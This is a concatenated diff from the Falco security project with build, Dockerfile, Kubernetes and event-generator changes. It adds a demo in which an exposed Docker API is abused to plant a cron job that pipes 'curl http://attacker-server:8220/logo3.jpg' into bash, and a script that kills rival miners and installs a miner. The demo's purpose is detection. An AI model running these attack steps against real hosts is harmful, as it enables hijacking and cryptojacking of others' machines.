set(JQ_INCLUDE "${JQ_SRC}")
set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
ExternalProject_Add(jq
URL "https://s3.amazonaws.com/download.draios.com/dependencies/jq-1.5.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/jq-1.5.tar.gz"
URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
@@ -134,7 +134,7 @@ else()
set(CURSES_LIBRARIES "${CURSES_BUNDLE_DIR}/lib/libncurses.a")
message(STATUS "Using bundled ncurses in '${CURSES_BUNDLE_DIR}'")
ExternalProject_Add(ncurses
URL "https://s3.amazonaws.com/download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
URL_MD5 "32b8913312e738d707ae68da439ca1f4"
CONFIGURE_COMMAND ./configure --without-cxx --without-cxx-binding --without-ada --without-manpages --without-progs --without-tests --with-terminfo-dirs=/etc/terminfo:/lib/terminfo:/usr/share/terminfo
BUILD_COMMAND ${CMD_MAKE}
@@ -161,7 +161,7 @@ else()
set(B64_INCLUDE "${B64_SRC}/include")
set(B64_LIB "${B64_SRC}/src/libb64.a")
ExternalProject_Add(b64
URL "https://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
URL_MD5 "a609809408327117e2c643bed91b76c5"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE}
@@ -215,7 +215,7 @@ else()
message(STATUS "Using bundled openssl in '${OPENSSL_BUNDLE_DIR}'")
ExternalProject_Add(openssl
URL "https://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2j.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2j.tar.gz"
URL_MD5 "96322138f0b69e61b7212bc53d5e912b"
CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
BUILD_COMMAND ${CMD_MAKE}
@@ -246,7 +246,7 @@ else()
ExternalProject_Add(curl
DEPENDS openssl
URL "https://s3.amazonaws.com/download.draios.com/dependencies/curl-7.56.0.tar.bz2"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/curl-7.56.0.tar.bz2"
URL_MD5 "e0caf257103e0c77cee5be7e9ac66ca4"
CONFIGURE_COMMAND ./configure ${CURL_SSL_OPTION} --disable-shared --enable-optimize --disable-curldebug --disable-rt --enable-http --disable-ftp --disable-file --disable-ldap --disable-ldaps --disable-rtsp --disable-telnet --disable-tftp --disable-pop3 --disable-imap --disable-smb --disable-smtp --disable-gopher --disable-sspi --disable-ntlm-wb --disable-tls-srp --without-winssl --without-darwinssl --without-polarssl --without-cyassl --without-nss --without-axtls --without-ca-path --without-ca-bundle --without-libmetalink --without-librtmp --without-winidn --without-libidn --without-nghttp2 --without-libssh2 --disable-threaded-resolver
BUILD_COMMAND ${CMD_MAKE}
@@ -280,7 +280,7 @@ else()
set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
ExternalProject_Add(luajit
URL "https://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
URL_MD5 "f14e9104be513913810cd59c8c658dc0"
CONFIGURE_COMMAND ""
BUILD_COMMAND ${CMD_MAKE}
@@ -310,7 +310,7 @@ else()
endif()
ExternalProject_Add(lpeg
DEPENDS ${LPEG_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
URL_MD5 "0aec64ccd13996202ad0c099e2877ece"
BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
BUILD_IN_SOURCE 1
@@ -345,7 +345,7 @@ else()
set(LIBYAML_LIB "${LIBYAML_SRC}/.libs/libyaml.a")
message(STATUS "Using bundled libyaml in '${LIBYAML_SRC}'")
ExternalProject_Add(libyaml
URL "https://s3.amazonaws.com/download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
URL_MD5 "4a4bced818da0b9ae7fc8ebc690792a7"
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1
@@ -381,7 +381,7 @@ else()
endif()
ExternalProject_Add(lyaml
DEPENDS ${LYAML_DEPENDENCIES}
URL "https://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
URL "http://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
URL_MD5 "dc3494689a0dce7cf44e7a99c72b1f30"
BUILD_COMMAND ${CMD_MAKE}
BUILD_IN_SOURCE 1

View File

@@ -2,7 +2,7 @@
#### Latest release
**v0.8.1**
**v0.9.0**
Read the [change log](https://github.com/draios/falco/blob/dev/CHANGELOG.md)
Dev Branch: [![Build Status](https://travis-ci.org/draios/falco.svg?branch=dev)](https://travis-ci.org/draios/falco)<br />

View File

@@ -1,3 +1,4 @@
/etc/falco/falco.yaml
/etc/falco/falco_rules.yaml
/etc/falco/application_rules.yaml
/etc/falco/falco_rules.local.yaml

View File

@@ -14,8 +14,7 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
&& apt-get update \
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
bash-completion \
curl \
@@ -24,18 +23,11 @@ RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources
ca-certificates \
gcc \
gcc-5 \
gcc-4.9 && rm -rf /var/lib/apt/lists/*
gdb && rm -rf /var/lib/apt/lists/*
# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
# by symlinking it to 4.9
RUN rm -rf /usr/bin/gcc \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
# default to gcc-5.
RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \

View File

@@ -50,6 +50,8 @@ void usage(char *program)
printf(" then read a sensitive file\n");
printf(" write_rpm_database Write to files below /var/lib/rpm\n");
printf(" spawn_shell Run a shell (bash)\n");
printf(" Used by spawn_shell_under_httpd below\n");
printf(" spawn_shell_under_httpd Run a shell (bash) under a httpd process\n");
printf(" db_program_spawn_process As a database program, try to spawn\n");
printf(" another program\n");
printf(" modify_binary_dirs Modify a file below /bin\n");
@@ -64,7 +66,7 @@ void usage(char *program)
printf(" non_sudo_setuid Setuid as a non-root user\n");
printf(" create_files_below_dev Create files below /dev\n");
printf(" exec_ls execve() the program ls\n");
printf(" (used by user_mgmt_binaries below)\n");
printf(" (used by user_mgmt_binaries, db_program_spawn_process)\n");
printf(" user_mgmt_binaries Become the program \"vipw\", which triggers\n");
printf(" rules related to user management programs\n");
printf(" exfiltration Read /etc/shadow and send it via udp to a\n");
@@ -230,9 +232,14 @@ void spawn_shell() {
}
}
void spawn_shell_under_httpd() {
printf("Becoming the program \"httpd\" and then spawning a shell\n");
respawn("./httpd", "spawn_shell", "0");
}
void db_program_spawn_process() {
printf("Becoming the program \"mysql\" and then spawning a shell\n");
respawn("./mysqld", "spawn_shell", "0");
printf("Becoming the program \"mysql\" and then running ls\n");
respawn("./mysqld", "exec_ls", "0");
}
void modify_binary_dirs() {
@@ -360,6 +367,7 @@ map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
{"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
{"write_rpm_database", write_rpm_database},
{"spawn_shell", spawn_shell},
{"spawn_shell_under_httpd", spawn_shell_under_httpd},
{"db_program_spawn_process", db_program_spawn_process},
{"modify_binary_dirs", modify_binary_dirs},
{"mkdir_binary_dirs", mkdir_binary_dirs},
@@ -375,7 +383,7 @@ map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
// Some actions don't directly result in suspicious behavior. These
// actions are excluded from the ones run with -a all.
set<string> exclude_from_all_actions = {"exec_ls", "network_activity"};
set<string> exclude_from_all_actions = {"spawn_shell", "exec_ls", "network_activity"};
void create_symlinks(const char *program)
{

View File

@@ -14,8 +14,7 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
&& apt-get update \
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
bash-completion \
curl \
@@ -24,19 +23,11 @@ RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources
ca-certificates \
gcc \
gcc-5 \
gcc-4.9 \
dkms && rm -rf /var/lib/apt/lists/*
# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
# by symlinking it to 4.9
RUN rm -rf /usr/bin/gcc \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
# default to gcc-5.
RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
RUN ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules

View File

@@ -14,8 +14,7 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources.list.d/jessie.list \
&& apt-get update \
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
bash-completion \
curl \
@@ -23,19 +22,11 @@ RUN echo "deb http://httpredir.debian.org/debian jessie main" > /etc/apt/sources
ca-certificates \
gnupg2 \
gcc \
gcc-5 \
gcc-4.9 && rm -rf /var/lib/apt/lists/*
gcc-5 && rm -rf /var/lib/apt/lists/*
# Since our base Debian image ships with GCC 5.0 which breaks older kernels, revert the
# default to gcc-4.9. Also, since some customers use some very old distributions whose kernel
# makefile is hardcoded for gcc-4.6 or so (e.g. Debian Wheezy), we pretend to have gcc 4.6/4.7
# by symlinking it to 4.9
RUN rm -rf /usr/bin/gcc \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.8 \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.7 \
&& ln -s /usr/bin/gcc-4.9 /usr/bin/gcc-4.6
# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
# default to gcc-5.
RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \

View File

@@ -0,0 +1,117 @@
# Demo of Falco Detecting Cryptomining Exploit
## Introduction
Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Sysdig Falco.
Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
## Requirements
In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
## Example architecture
The example consists of the following:
* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker.
* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
A separate container is created to launch the attack:
* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
## Example Walkthrough
### Start everything using docker-compose
To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
You will see fairly verbose output from dockerd:
```
host-machine_1 | crond: crond (busybox 1.27.2) started, log level 6
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
```
When you see log output like the following, you know that falco is started and ready:
```
falco_1 | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
```
### Launch malicious container
To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
The script `launch_malicious_container.sh` performs the necessary POSTs:
* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
* `http://localhost:2375/containers/create?&name=docker123321-mysql`
* `http://localhost:2375/containers/docker123321-mysql/start`
Run the script via `bash launch_malicious_container.sh`.
### Examine cron output as malicious software is installed & run
`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
```
* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
```
It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it.
You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
```
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
68ed578bd034 alpine:latest "/bin/sh -c 'echo '*…" About a minute ago Up About a minute docker123321-mysql
```
Once the cron job runs, you will see output like the following:
```
host-machine_1 | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
host-machine_1 | ***Checking for existing Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
host-machine_1 | ***Killing competing Miner programs
host-machine_1 | ***Reinstalling cron job to run Miner program
host-machine_1 | ***Configuring Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
host-machine_1 | ***Configuring system for Miner program
host-machine_1 | vm.nr_hugepages = 9
host-machine_1 | ***Running Miner program
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
```
### Observe Falco detecting malicious activity
To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
```
falco_1 | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
falco_1 | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
```
### Cleanup
To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.

View File

@@ -0,0 +1,14 @@
server {
listen 8220;
server_name localhost;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}

View File

@@ -0,0 +1 @@
{"config": "some-bitcoin-miner-config-goes-here"}

View File

@@ -0,0 +1,64 @@
#!/bin/sh
echo "***Checking for existing Miner program"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
echo "***Killing competing Miner programs"
rm -rf /var/tmp/ysjswirmrm.conf
rm -rf /var/tmp/sshd
ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
echo "***Reinstalling cron job to run Miner program"
crontab -r || true && \
echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true
echo "***Configuring Miner program"
curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
curl -so /var/tmp/jaav http://attacker-server:8220/minerd
chmod 777 /var/tmp/jaav
cd /var/tmp
echo "***Configuring system for Miner program"
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=$num
echo "***Running Miner program"
nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "***Ensuring Miner program is alive"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
echo "***Reconfiguring Miner program"
curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
curl -so /var/tmp/jaav http://attacker-server:8220/minerd
chmod 777 /var/tmp/jaav
cd /var/tmp
echo "***Reconfiguring system for Miner program"
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=$num
echo "***Restarting Miner program"
nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "runing....."

View File

@@ -0,0 +1,8 @@
#!/bin/bash
while true; do
echo "Mining bitcoins..."
sleep 60
done

View File

@@ -0,0 +1,41 @@
version: '3'
volumes:
host-filesystem:
docker-socket:
services:
host-machine:
privileged: true
build:
context: ${PWD}/host-machine
dockerfile: ${PWD}/host-machine/Dockerfile
volumes:
- host-filesystem:/etc
- docker-socket:/var/run
ports:
- "2375:2375"
depends_on:
- "falco"
attacker-server:
image: nginx:latest
ports:
- "8220:8220"
volumes:
- ${PWD}/attacker_files:/usr/share/nginx/html
- ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
depends_on:
- "falco"
falco:
image: sysdig/falco:latest
privileged: true
volumes:
- docker-socket:/host/var/run
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
tty: true

View File

@@ -0,0 +1,7 @@
{
"Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
"Image": "alpine:latest",
"HostConfig": {
"Binds": ["/etc:/mnt/etc"]
}
}

View File

@@ -0,0 +1,12 @@
FROM docker:stable-dind
RUN set -ex \
&& apk add --no-cache \
bash curl
COPY start-cron-and-dind.sh /usr/local/bin
ENTRYPOINT ["start-cron-and-dind.sh"]
CMD []

View File

@@ -0,0 +1,11 @@
#!/bin/sh
# Start docker-in-docker, but backgrounded with its output still going
# to stdout/stderr.
dockerd-entrypoint.sh &
# Start cron in the foreground with a moderate level of debugging to
# see job output.
crond -f -d 6

View File

@@ -0,0 +1,14 @@
#!/bin/sh
echo "Pulling alpine:latest image to docker-in-docker instance"
curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
echo "Creating container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
echo "Running container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'

View File

@@ -1,5 +1,92 @@
# Example K8s Services for Falco
# Example Kubernetes Daemon Sets for Sysdig Falco
The yaml file in this directory installs the following:
- Open Source Falco, as a DaemonSet. Falco is configured to communicate with the K8s API server via its service account, and changes its output to be K8s-friendly. It also sends to a slack webhook for the `#demo-falco-alerts` channel on our [public slack](https://sysdig.slack.com/messages/demo-falco-alerts/).
- The [Falco Event Generator](https://github.com/draios/falco/wiki/Generating-Sample-Events), as a deployment that ensures it runs on exactly 1 node.
This directory gives you the required YAML files to stand up Sysdig Falco on Kubernetes as a Daemon Set. This will result in a Falco Pod being deployed to each node, and thus the ability to monitor any running containers for abnormal behavior.
The two options are provided to deploy a Daemon Set:
- `k8s-with-rbac` - This directory provides a definition to deploy a Daemon Set on Kubernetes with RBAC enabled.
- `k8s-without-rbac` - This directory provides a definition to deploy a Daemon Set on Kubernetes without RBAC enabled.
Also provided:
- `falco-event-generator-deployment.yaml` - A Kubernetes Deployment to generate sample events. This is useful for testing, but note it will generate a large number of events.
## Deploying to Kubernetes with RBAC enabled
Since v1.8 RBAC has been available in Kubernetes, and running with RBAC enabled is considered the best practice. The `k8s-with-rbac` directory provides the YAML to create a Service Account for Falco, as well as the ClusterRoles and bindings to grant the appropriate permissions to the Service Account.
```
k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-account.yaml
serviceaccount "falco-account" created
clusterrole "falco-cluster-role" created
clusterrolebinding "falco-cluster-role-binding" created
k8s-using-daemonset$
```
The Daemon Set also relies on a Kubernetes ConfigMap to store the Falco configuration and make the configuration available to the Falco Pods. This allows you to manage custom configuration without rebuilding and redeploying the underlying Pods. In order to create the ConfigMap you'll need to first need to copy the required configuration from their location in this GitHub repo to the `k8s-with-rbac/falco-config/` directory. Any modification of the configuration should be performed on these copies rather than the original files.
```
k8s-using-daemonset$ cp ../../falco.yaml k8s-with-rbac/falco-config/
k8s-using-daemonset$ cp ../../rules/falco_rules.* k8s-with-rbac/falco-config/
```
If you want to send Falco alerts to a Slack channel, you'll want to modify the `falco.yaml` file to point to your Slack webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Add the below to the bottom of the `falco.yaml` config file you just copied to enable Slack messages.
```
program_output:
enabled: true
keep_alive: false
program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"
```
You will also need to enable JSON output. Find the `json_output: false` setting in the `falco.yaml` file and change it to read `json_output: true`. Any custom rules for your environment can be added to into the `falco_rules.local.yaml` file and they will be picked up by Falco at start time. You can now create the ConfigMap in Kubernetes.
```
k8s-using-daemonset$ kubectl create configmap falco-config --from-file=k8s-with-rbac/falco-config
configmap "falco-config" created
k8s-using-daemonset$
```
Now that we have the requirements for our Daemon Set in place, we can create our Daemon Set.
```
k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-daemonset-configmap.yaml
daemonset "falco" created
k8s-using-daemonset$
```
## Deploying to Kubernetes without RBAC enabled
If you are running Kubernetes with Legacy Authorization enabled, you can use `kubectl` to deploy the Daemon Set provided in the `k8s-without-rbac` directory. The example provides the ability to post messages to a Slack channel via a webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Modify the [`args`](https://github.com/draios/falco/blob/dev/examples/k8s-using-daemonset/falco-daemonset.yaml#L21) passed to the Falco container to point to the appropriate URL for your webhook.
```
k8s-using-daemonset$ kubectl create -f k8s-without-rbac/falco-daemonset.yaml
```
## Verifying the installation
In order to test that Falco is working correctly, you can launch a shell in a Pod. You should see a message in your Slack channel (if configured), or in the logs of the Falco pod.
```
k8s-using-daemonset$ kubectl get pods
NAME READY STATUS RESTARTS AGE
falco-74htl 1/1 Running 0 13h
falco-fqz2m 1/1 Running 0 13h
falco-sgjfx 1/1 Running 0 13h
k8s-using-daemonset$ kubectl exec -it falco-74htl bash
root@falco-74htl:/# exit
k8s-using-daemonset$ kubectl logs falco-74htl
{"output":"17:48:58.590038385: Notice A shell was spawned in a container with an attached terminal (user=root k8s.pod=falco-74htl container=a98c2aa8e670 shell=bash parent=<NA> cmdline=bash terminal=34816)","priority":"Notice","rule":"Terminal shell in container","time":"2017-12-20T17:48:58.590038385Z", "output_fields": {"container.id":"a98c2aa8e670","evt.time":1513792138590038385,"k8s.pod.name":"falco-74htl","proc.cmdline":"bash ","proc.name":"bash","proc.pname":null,"proc.tty":34816,"user.name":"root"}}
k8s-using-daemonset$
```
Alternatively, you can deploy the [Falco Event Generator](https://github.com/draios/falco/wiki/Generating-Sample-Events) deployement to have events automatically generated. Please note that this Deployment will generate a large number of events.
```
k8s-using-daemonset$ kubectl create -f falco-event-generator-deployment.yaml \
&& sleep 1 \
&& kubectl delete -f falco-event-generator-deployment.yaml
deployment "falco-event-generator-deployment" created
deployment "falco-event-generator-deployment" deleted
k8s-using-daemonset$
```

View File

@@ -0,0 +1,29 @@
apiVersion: v1
kind: ServiceAccount
metadata:
name: falco-account
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: falco-cluster-role
rules:
- apiGroups: ["extensions",""]
resources: ["nodes","namespaces","pods","replicationcontrollers","services","events","configmaps"]
verbs: ["get","list","watch"]
- nonResourceURLs: ["/healthz", "/healthz/*"]
verbs: ["get"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: falco-cluster-role-binding
namespace: default
subjects:
- kind: ServiceAccount
name: falco-account
namespace: default
roleRef:
kind: ClusterRole
name: falco-cluster-role
apiGroup: rbac.authorization.k8s.io

View File

@@ -0,0 +1,63 @@
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: falco
labels:
name: falco-daemonset
app: demo
spec:
template:
metadata:
labels:
name: falco
app: demo
role: security
spec:
serviceAccount: falco-account
containers:
- name: falco
image: sysdig/falco:latest
securityContext:
privileged: true
args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk"]
volumeMounts:
- mountPath: /host/var/run/docker.sock
name: docker-socket
- mountPath: /host/dev
name: dev-fs
- mountPath: /host/proc
name: proc-fs
readOnly: true
- mountPath: /host/boot
name: boot-fs
readOnly: true
- mountPath: /host/lib/modules
name: lib-modules
readOnly: true
- mountPath: /host/usr
name: usr-fs
readOnly: true
- mountPath: /etc/falco
name: falco-config
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock
- name: dev-fs
hostPath:
path: /dev
- name: proc-fs
hostPath:
path: /proc
- name: boot-fs
hostPath:
path: /boot
- name: lib-modules
hostPath:
path: /lib/modules
- name: usr-fs
hostPath:
path: /usr
- name: falco-config
configMap:
name: falco-config

View File

@@ -18,14 +18,12 @@ spec:
image: sysdig/falco:latest
securityContext:
privileged: true
args: [ "/usr/bin/falco", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o", "program_output.program=jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/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"]
